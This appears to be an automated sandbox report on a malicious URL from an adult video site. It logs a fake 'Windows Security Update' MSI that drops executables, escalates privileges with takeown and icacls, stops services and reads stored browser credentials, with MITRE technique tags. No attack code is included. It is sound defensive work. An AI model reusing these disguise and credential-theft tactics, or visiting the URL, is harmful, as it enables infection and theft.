hxxps://pornovideos8k[.]com/watch[.]php

Analysis

max time kernel
476s
max time network
604s
platform
windows10_x64
resource
win10v20210410
submitted
08-06-2021 14:56

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://pornovideos8k.com/watch.php
Sample

210608-mlx9gjmpwn

Score

8^/10

discovery evasion exploit spyware stealer

Malware Config

Signatures

Blocklisted process makes network request 1 IoCs

Processes:

msiexec.exe

flow pid process

131 3432 msiexec.exe

flow	pid	process
131	3432	msiexec.exe

Executes dropped EXE 6 IoCs

Processes:

software_reporter_tool.exesoftware_reporter_tool.exesoftware_reporter_tool.exesoftware_reporter_tool.exej_service.exeRegister.exe

pid	process
1588	software_reporter_tool.exe
1852	software_reporter_tool.exe
844	software_reporter_tool.exe
2868	software_reporter_tool.exe
3136	j_service.exe
3212	Register.exe

Possible privilege escalation attempt 3 IoCs
exploit

Processes:

takeown.exeicacls.exeicacls.exe

pid process

4524 takeown.exe
4224 icacls.exe
4180 icacls.exe
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

pid	process
4524	takeown.exe
4224	icacls.exe
4180	icacls.exe

Loads dropped DLL 20 IoCs

Processes:

software_reporter_tool.exeMsiExec.exeMsiExec.exej_service.exeRegister.exeregsvr32.exe

pid	process
844	software_reporter_tool.exe
844	software_reporter_tool.exe
844	software_reporter_tool.exe
844	software_reporter_tool.exe
844	software_reporter_tool.exe
844	software_reporter_tool.exe
844	software_reporter_tool.exe
4516	MsiExec.exe
1212	MsiExec.exe
3136	j_service.exe
3136	j_service.exe
3136	j_service.exe
3136	j_service.exe
3136	j_service.exe
1212	MsiExec.exe
3212	Register.exe
3212	Register.exe
3136	j_service.exe
3136	j_service.exe
4024	regsvr32.exe

Modifies file permissions 1 TTPs 3 IoCs
discovery

File Permissions Modification
T1222

Processes:

takeown.exeicacls.exeicacls.exe

pid process

4524 takeown.exe
4224 icacls.exe
4180 icacls.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

pid	process
4524	takeown.exe
4224	icacls.exe
4180	icacls.exe

Enumerates connected drives 3 TTPs 48 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

msiexec.exemsiexec.exe

description	ioc	process
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\F:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\F:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe

Drops file in Program Files directory 31 IoCs

Processes:

msiexec.exe

description	ioc	process
File created	C:\Program Files (x86)\Microsoft Corporation\Windows Security Update\api-ms-win-core-file-l1-2-0.dll	msiexec.exe
File created	C:\Program Files (x86)\Microsoft Corporation\Windows Security Update\api-ms-win-crt-environment-l1-1-0.dll	msiexec.exe
File created	C:\Program Files (x86)\Microsoft Corporation\Windows Security Update\api-ms-win-crt-heap-l1-1-0.dll	msiexec.exe
File created	C:\Program Files (x86)\Microsoft Corporation\Windows Security Update\libcurl.dll	msiexec.exe
File created	C:\Program Files (x86)\Microsoft Corporation\Windows Security Update\msvcp140.dll	msiexec.exe
File created	C:\Program Files (x86)\Microsoft Corporation\Windows Security Update\api-ms-win-core-synch-l1-2-0.dll	msiexec.exe
File created	C:\Program Files (x86)\Microsoft Corporation\Windows Security Update\api-ms-win-core-timezone-l1-1-0.dll	msiexec.exe
File created	C:\Program Files (x86)\Microsoft Corporation\Windows Security Update\api-ms-win-crt-multibyte-l1-1-0.dll	msiexec.exe
File created	C:\Program Files (x86)\Microsoft Corporation\Windows Security Update\j_service.exe	msiexec.exe
File created	C:\Program Files (x86)\Microsoft Corporation\Windows Security Update\AccessibleHandler.dll	msiexec.exe
File created	C:\Program Files (x86)\Microsoft Corporation\Windows Security Update\api-ms-win-core-localization-l1-2-0.dll	msiexec.exe
File created	C:\Program Files (x86)\Microsoft Corporation\Windows Security Update\api-ms-win-crt-private-l1-1-0.dll	msiexec.exe
File created	C:\Program Files (x86)\Microsoft Corporation\Windows Security Update\api-ms-win-crt-runtime-l1-1-0.dll	msiexec.exe
File created	C:\Program Files (x86)\Microsoft Corporation\Windows Security Update\setup.bat	msiexec.exe
File created	C:\Program Files (x86)\Microsoft Corporation\Windows Security Update\Register.exe	msiexec.exe
File created	C:\Program Files (x86)\Microsoft Corporation\Windows Security Update\api-ms-win-core-file-l2-1-0.dll	msiexec.exe
File created	C:\Program Files (x86)\Microsoft Corporation\Windows Security Update\api-ms-win-crt-convert-l1-1-0.dll	msiexec.exe
File created	C:\Program Files (x86)\Microsoft Corporation\Windows Security Update\libssl-1_1.dll	msiexec.exe
File created	C:\Program Files (x86)\Microsoft Corporation\Windows Security Update\api-ms-win-crt-locale-l1-1-0.dll	msiexec.exe
File created	C:\Program Files (x86)\Microsoft Corporation\Windows Security Update\api-ms-win-crt-process-l1-1-0.dll	msiexec.exe
File created	C:\Program Files (x86)\Microsoft Corporation\Windows Security Update\api-ms-win-crt-utility-l1-1-0.dll	msiexec.exe
File created	C:\Program Files (x86)\Microsoft Corporation\Windows Security Update\libcrypto-1_1.dll	msiexec.exe
File created	C:\Program Files (x86)\Microsoft Corporation\Windows Security Update\NSudo.exe	msiexec.exe
File created	C:\Program Files (x86)\Microsoft Corporation\Windows Security Update\vcruntime140.dll	msiexec.exe
File created	C:\Program Files (x86)\Microsoft Corporation\Windows Security Update\api-ms-win-crt-filesystem-l1-1-0.dll	msiexec.exe
File created	C:\Program Files (x86)\Microsoft Corporation\Windows Security Update\api-ms-win-crt-string-l1-1-0.dll	msiexec.exe
File created	C:\Program Files (x86)\Microsoft Corporation\Windows Security Update\api-ms-win-core-processthreads-l1-1-1.dll	msiexec.exe
File created	C:\Program Files (x86)\Microsoft Corporation\Windows Security Update\api-ms-win-crt-conio-l1-1-0.dll	msiexec.exe
File created	C:\Program Files (x86)\Microsoft Corporation\Windows Security Update\api-ms-win-crt-math-l1-1-0.dll	msiexec.exe
File created	C:\Program Files (x86)\Microsoft Corporation\Windows Security Update\api-ms-win-crt-stdio-l1-1-0.dll	msiexec.exe
File created	C:\Program Files (x86)\Microsoft Corporation\Windows Security Update\api-ms-win-crt-time-l1-1-0.dll	msiexec.exe

Drops file in Windows directory 14 IoCs

Processes:

msiexec.exeMsiExec.exe

description	ioc	process
File opened for modification	C:\Windows\Installer\	msiexec.exe
File created	C:\Windows\Installer\inprogressinstallinfo.ipi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIB9C9.tmp	msiexec.exe
File created	C:\Windows\Installer\wix{A22123CC-FEB4-4470-9D68-581CAB998559}.SchedServiceConfig.rmi	MsiExec.exe
File created	C:\Windows\Installer\{A22123CC-FEB4-4470-9D68-581CAB998559}\Logo.ico	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIBE02.tmp	msiexec.exe
File created	C:\Windows\Installer\f79b7c4.msi	msiexec.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log	msiexec.exe
File created	C:\Windows\Installer\f79b7c6.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\{A22123CC-FEB4-4470-9D68-581CAB998559}\Logo.ico	msiexec.exe
File opened for modification	C:\Windows\Installer\f79b7c4.msi	msiexec.exe
File created	C:\Windows\Installer\SourceHash{A22123CC-FEB4-4470-9D68-581CAB998559}	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIB97A.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIBD26.tmp	msiexec.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

chrome.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe

Kills process with taskkill 1 IoCs
evasion

Processes:

taskkill.exe

pid process

4024 taskkill.exe

pid	process
4024	taskkill.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exemsiexec.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16	msiexec.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe

Modifies registry class 24 IoCs

Processes:

msiexec.exechrome.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\CC32122A4BEF0744D98685C1BA995895\PackageCode = "C2B82E66163816847A8E9D819CED961E"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\CC32122A4BEF0744D98685C1BA995895\InstanceType = "0"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\4283AD5241F3747428B68F1D87E32188	msiexec.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\CC32122A4BEF0744D98685C1BA995895\Clients = 3a0000000000	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\CC32122A4BEF0744D98685C1BA995895\SourceList	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\CC32122A4BEF0744D98685C1BA995895\SourceList\Media\1 = ";"	msiexec.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings	chrome.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\CC32122A4BEF0744D98685C1BA995895	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\CC32122A4BEF0744D98685C1BA995895\ProductIcon = "C:\\Windows\\Installer\\{A22123CC-FEB4-4470-9D68-581CAB998559}\\Logo.ico"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\CC32122A4BEF0744D98685C1BA995895\AuthorizedLUAApp = "0"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\4283AD5241F3747428B68F1D87E32188\CC32122A4BEF0744D98685C1BA995895	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\CC32122A4BEF0744D98685C1BA995895\SourceList\Media	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\CC32122A4BEF0744D98685C1BA995895\ProductFeature	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\CC32122A4BEF0744D98685C1BA995895\ProductName = "Windows Security Update"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\CC32122A4BEF0744D98685C1BA995895\Language = "1033"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\CC32122A4BEF0744D98685C1BA995895\Assignment = "1"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\CC32122A4BEF0744D98685C1BA995895\SourceList\Net	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\CC32122A4BEF0744D98685C1BA995895\SourceList\Net\1 = "C:\\Users\\Admin\\Downloads\\"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\CC32122A4BEF0744D98685C1BA995895\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\Downloads\\"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\CC32122A4BEF0744D98685C1BA995895	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\CC32122A4BEF0744D98685C1BA995895\Version = "17367040"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\CC32122A4BEF0744D98685C1BA995895\AdvertiseFlags = "388"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\CC32122A4BEF0744D98685C1BA995895\DeploymentFlags = "3"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\CC32122A4BEF0744D98685C1BA995895\SourceList\PackageName = "Java (2).msi"	msiexec.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

chrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exesoftware_reporter_tool.exechrome.exechrome.exemsiexec.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
4440	chrome.exe
4440	chrome.exe
5052	chrome.exe
5052	chrome.exe
2744	chrome.exe
2744	chrome.exe
3924	chrome.exe
3924	chrome.exe
3524	chrome.exe
3524	chrome.exe
4460	chrome.exe
4460	chrome.exe
3880	chrome.exe
3880	chrome.exe
1192	chrome.exe
1192	chrome.exe
1192	chrome.exe
1192	chrome.exe
3832	chrome.exe
3832	chrome.exe
1588	software_reporter_tool.exe
1588	software_reporter_tool.exe
1292	chrome.exe
1292	chrome.exe
4708	chrome.exe
4708	chrome.exe
2212	msiexec.exe
2212	msiexec.exe
3940	powershell.exe
4304	powershell.exe
3940	powershell.exe
4304	powershell.exe
4860	powershell.exe
4860	powershell.exe
4860	powershell.exe
4304	powershell.exe
3940	powershell.exe
3940	powershell.exe
4860	powershell.exe
4304	powershell.exe
1972	powershell.exe
1972	powershell.exe
3036	powershell.exe
3036	powershell.exe
376	powershell.exe
376	powershell.exe
4252	powershell.exe
4252	powershell.exe
680	powershell.exe
680	powershell.exe
404	powershell.exe
404	powershell.exe
4740	powershell.exe
4740	powershell.exe
688	powershell.exe
688	powershell.exe
900	powershell.exe
900	powershell.exe
1228	powershell.exe
1228	powershell.exe
2592	powershell.exe
2592	powershell.exe
1960	powershell.exe
1896	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

AUDIODG.EXEsoftware_reporter_tool.exesoftware_reporter_tool.exesoftware_reporter_tool.exesoftware_reporter_tool.exemsiexec.exemsiexec.exeMsiExec.exe

description	pid	process
Token: 33	4284	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	4284	AUDIODG.EXE
Token: 33	1852	software_reporter_tool.exe
Token: SeIncBasePriorityPrivilege	1852	software_reporter_tool.exe
Token: 33	1588	software_reporter_tool.exe
Token: SeIncBasePriorityPrivilege	1588	software_reporter_tool.exe
Token: 33	844	software_reporter_tool.exe
Token: SeIncBasePriorityPrivilege	844	software_reporter_tool.exe
Token: 33	2868	software_reporter_tool.exe
Token: SeIncBasePriorityPrivilege	2868	software_reporter_tool.exe
Token: SeShutdownPrivilege	3432	msiexec.exe
Token: SeIncreaseQuotaPrivilege	3432	msiexec.exe
Token: SeSecurityPrivilege	2212	msiexec.exe
Token: SeCreateTokenPrivilege	3432	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	3432	msiexec.exe
Token: SeLockMemoryPrivilege	3432	msiexec.exe
Token: SeIncreaseQuotaPrivilege	3432	msiexec.exe
Token: SeMachineAccountPrivilege	3432	msiexec.exe
Token: SeTcbPrivilege	3432	msiexec.exe
Token: SeSecurityPrivilege	3432	msiexec.exe
Token: SeTakeOwnershipPrivilege	3432	msiexec.exe
Token: SeLoadDriverPrivilege	3432	msiexec.exe
Token: SeSystemProfilePrivilege	3432	msiexec.exe
Token: SeSystemtimePrivilege	3432	msiexec.exe
Token: SeProfSingleProcessPrivilege	3432	msiexec.exe
Token: SeIncBasePriorityPrivilege	3432	msiexec.exe
Token: SeCreatePagefilePrivilege	3432	msiexec.exe
Token: SeCreatePermanentPrivilege	3432	msiexec.exe
Token: SeBackupPrivilege	3432	msiexec.exe
Token: SeRestorePrivilege	3432	msiexec.exe
Token: SeShutdownPrivilege	3432	msiexec.exe
Token: SeDebugPrivilege	3432	msiexec.exe
Token: SeAuditPrivilege	3432	msiexec.exe
Token: SeSystemEnvironmentPrivilege	3432	msiexec.exe
Token: SeChangeNotifyPrivilege	3432	msiexec.exe
Token: SeRemoteShutdownPrivilege	3432	msiexec.exe
Token: SeUndockPrivilege	3432	msiexec.exe
Token: SeSyncAgentPrivilege	3432	msiexec.exe
Token: SeEnableDelegationPrivilege	3432	msiexec.exe
Token: SeManageVolumePrivilege	3432	msiexec.exe
Token: SeImpersonatePrivilege	3432	msiexec.exe
Token: SeCreateGlobalPrivilege	3432	msiexec.exe
Token: SeRestorePrivilege	2212	msiexec.exe
Token: SeTakeOwnershipPrivilege	2212	msiexec.exe
Token: SeRestorePrivilege	2212	msiexec.exe
Token: SeTakeOwnershipPrivilege	2212	msiexec.exe
Token: SeRestorePrivilege	2212	msiexec.exe
Token: SeTakeOwnershipPrivilege	2212	msiexec.exe
Token: SeRestorePrivilege	2212	msiexec.exe
Token: SeTakeOwnershipPrivilege	2212	msiexec.exe
Token: SeRestorePrivilege	2212	msiexec.exe
Token: SeTakeOwnershipPrivilege	2212	msiexec.exe
Token: SeShutdownPrivilege	1212	MsiExec.exe
Token: SeRestorePrivilege	2212	msiexec.exe
Token: SeTakeOwnershipPrivilege	2212	msiexec.exe
Token: SeRestorePrivilege	2212	msiexec.exe
Token: SeTakeOwnershipPrivilege	2212	msiexec.exe
Token: SeRestorePrivilege	2212	msiexec.exe
Token: SeTakeOwnershipPrivilege	2212	msiexec.exe
Token: SeRestorePrivilege	2212	msiexec.exe
Token: SeTakeOwnershipPrivilege	2212	msiexec.exe
Token: SeRestorePrivilege	2212	msiexec.exe
Token: SeTakeOwnershipPrivilege	2212	msiexec.exe
Token: SeRestorePrivilege	2212	msiexec.exe

Suspicious use of FindShellTrayWindow 52 IoCs

Processes:

chrome.exemsiexec.exe

pid	process
4440	chrome.exe
4440	chrome.exe
4440	chrome.exe
4440	chrome.exe
4440	chrome.exe
4440	chrome.exe
4440	chrome.exe
4440	chrome.exe
4440	chrome.exe
4440	chrome.exe
4440	chrome.exe
4440	chrome.exe
4440	chrome.exe
4440	chrome.exe
4440	chrome.exe
4440	chrome.exe
4440	chrome.exe
4440	chrome.exe
4440	chrome.exe
4440	chrome.exe
4440	chrome.exe
4440	chrome.exe
4440	chrome.exe
4440	chrome.exe
4440	chrome.exe
4440	chrome.exe
4440	chrome.exe
4440	chrome.exe
4440	chrome.exe
4440	chrome.exe
4440	chrome.exe
4440	chrome.exe
4440	chrome.exe
4440	chrome.exe
4440	chrome.exe
4440	chrome.exe
4440	chrome.exe
4440	chrome.exe
4440	chrome.exe
4440	chrome.exe
4440	chrome.exe
4440	chrome.exe
4440	chrome.exe
4440	chrome.exe
4440	chrome.exe
4440	chrome.exe
4440	chrome.exe
4440	chrome.exe
4440	chrome.exe
4440	chrome.exe
3432	msiexec.exe
3432	msiexec.exe

Suspicious use of SetWindowsHookEx 2 IoCs

Processes:

Register.exe

pid process

3212 Register.exe
3212 Register.exe

pid	process
3212	Register.exe
3212	Register.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

chrome.exe

description	pid	process	target process
PID 4440 wrote to memory of 4568	4440	chrome.exe	chrome.exe
PID 4440 wrote to memory of 4568	4440	chrome.exe	chrome.exe
PID 4440 wrote to memory of 4984	4440	chrome.exe	chrome.exe
PID 4440 wrote to memory of 4984	4440	chrome.exe	chrome.exe
PID 4440 wrote to memory of 4984	4440	chrome.exe	chrome.exe
PID 4440 wrote to memory of 4984	4440	chrome.exe	chrome.exe
